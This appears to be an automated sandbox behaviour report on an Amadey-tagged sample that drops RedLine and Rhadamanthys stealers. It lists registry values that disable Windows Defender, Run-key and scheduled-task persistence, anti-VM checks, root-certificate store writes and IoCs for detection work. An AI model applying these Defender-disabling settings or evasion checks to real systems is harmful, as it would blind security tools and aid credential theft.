amadey | 97c883d8a0c071f9cb24f5fbd232ba088b2af79a04ee091073cf38701a1fe44f

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

tz0476.exev9844pN.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v9844pN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v9844pN.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz0476.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v9844pN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v9844pN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v9844pN.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 24 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1536-148-0x0000000000EF0000-0x0000000000F36000-memory.dmp	family_redline
behavioral1/memory/1536-149-0x0000000002470000-0x00000000024B4000-memory.dmp	family_redline
behavioral1/memory/1536-150-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-151-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-153-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-155-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-157-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-159-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-161-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-163-0x0000000004E40000-0x0000000004E80000-memory.dmp	family_redline
behavioral1/memory/1536-166-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-167-0x0000000004E40000-0x0000000004E80000-memory.dmp	family_redline
behavioral1/memory/1536-169-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-171-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-175-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-177-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-181-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-183-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-185-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-187-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-179-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-173-0x0000000002470000-0x00000000024AE000-memory.dmp	family_redline
behavioral1/memory/1536-1060-0x0000000004E40000-0x0000000004E80000-memory.dmp	family_redline
behavioral1/memory/932-1175-0x00000000028B0000-0x0000000002930000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	serv.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	serv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	serv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	serv.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

serv.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions serv.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

15 932 powershell.exe
16 932 powershell.exe
37 936 powershell.exe
38 936 powershell.exe
Downloads MZ/PE file
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

serv.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	serv.exe

flow	pid	process
15	932	powershell.exe
16	932	powershell.exe
37	936	powershell.exe
38	936	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	serv.exe

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	serv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	serv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	serv.exe

Executes dropped EXE 22 IoCs

Processes:

zap0575.exezap1162.exezap9947.exetz0476.exev9844pN.exew12Ai07.exexoFTq64.exey05Uh10.exelegenda.exesqlcmd.exeworld.exeserv.exesvchost.exeYJROPMCQjRX9.exeDownloader.exemyp.execlip.exeDownloader.exemyp.execlip.exesqlcmd.exelegenda.exe

pid	process
1920	zap0575.exe
584	zap1162.exe
580	zap9947.exe
1332	tz0476.exe
1752	v9844pN.exe
1536	w12Ai07.exe
1332	xoFTq64.exe
2012	y05Uh10.exe
1260	legenda.exe
580	sqlcmd.exe
936	world.exe
1104	serv.exe
1340	svchost.exe
988	YJROPMCQjRX9.exe
1472	Downloader.exe
872	myp.exe
1056	clip.exe
564	Downloader.exe
1940	myp.exe
1184	clip.exe
1000	sqlcmd.exe
788	legenda.exe

Loads dropped DLL 53 IoCs

Processes:

710568b21a2c7f5c7bd86c62cdb43683.exezap0575.exezap1162.exezap9947.exev9844pN.exew12Ai07.exexoFTq64.exey05Uh10.exelegenda.exesqlcmd.exeworld.exeserv.exesvchost.exeYJROPMCQjRX9.exeDownloader.exemyp.execlip.exeDownloader.exemyp.execlip.exesqlcmd.exerundll32.exe

pid	process
1928	710568b21a2c7f5c7bd86c62cdb43683.exe
1920	zap0575.exe
1920	zap0575.exe
584	zap1162.exe
584	zap1162.exe
580	zap9947.exe
580	zap9947.exe
580	zap9947.exe
580	zap9947.exe
1752	v9844pN.exe
584	zap1162.exe
584	zap1162.exe
1536	w12Ai07.exe
1920	zap0575.exe
1332	xoFTq64.exe
1928	710568b21a2c7f5c7bd86c62cdb43683.exe
2012	y05Uh10.exe
2012	y05Uh10.exe
1260	legenda.exe
1260	legenda.exe
580	sqlcmd.exe
1260	legenda.exe
936	world.exe
1260	legenda.exe
1260	legenda.exe
1104	serv.exe
1260	legenda.exe
1260	legenda.exe
1340	svchost.exe
1260	legenda.exe
988	YJROPMCQjRX9.exe
1260	legenda.exe
1260	legenda.exe
1472	Downloader.exe
1472	Downloader.exe
872	myp.exe
1472	Downloader.exe
1472	Downloader.exe
1056	clip.exe
1260	legenda.exe
1260	legenda.exe
564	Downloader.exe
564	Downloader.exe
1940	myp.exe
564	Downloader.exe
564	Downloader.exe
1184	clip.exe
1260	legenda.exe
1000	sqlcmd.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe	upx
behavioral1/memory/1056-1307-0x0000000001330000-0x0000000001AFF000-memory.dmp	upx
behavioral1/memory/1184-1349-0x0000000000FB0000-0x000000000177F000-memory.dmp	upx
behavioral1/memory/1056-1378-0x0000000001330000-0x0000000001AFF000-memory.dmp	upx

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

tz0476.exev9844pN.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz0476.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	v9844pN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v9844pN.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	tz0476.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 17 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

710568b21a2c7f5c7bd86c62cdb43683.exezap1162.exeDownloader.exezap0575.exeDownloader.exezap9947.execlip.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	710568b21a2c7f5c7bd86c62cdb43683.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap1162.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap0575.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap9947.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\clip.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000123001\\clip.exe"	clip.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	710568b21a2c7f5c7bd86c62cdb43683.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap0575.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9947.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap1162.exe
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run	Downloader.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	serv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	serv.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

serv.exe

pid process

1104 serv.exe
1104 serv.exe
1104 serv.exe
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

serv.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN serv.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1104	serv.exe
1104	serv.exe
1104	serv.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	serv.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1636 schtasks.exe

pid	process
1636	schtasks.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

sqlcmd.exelegenda.exesqlcmd.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	sqlcmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	sqlcmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	legenda.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	legenda.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	legenda.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sqlcmd.exe
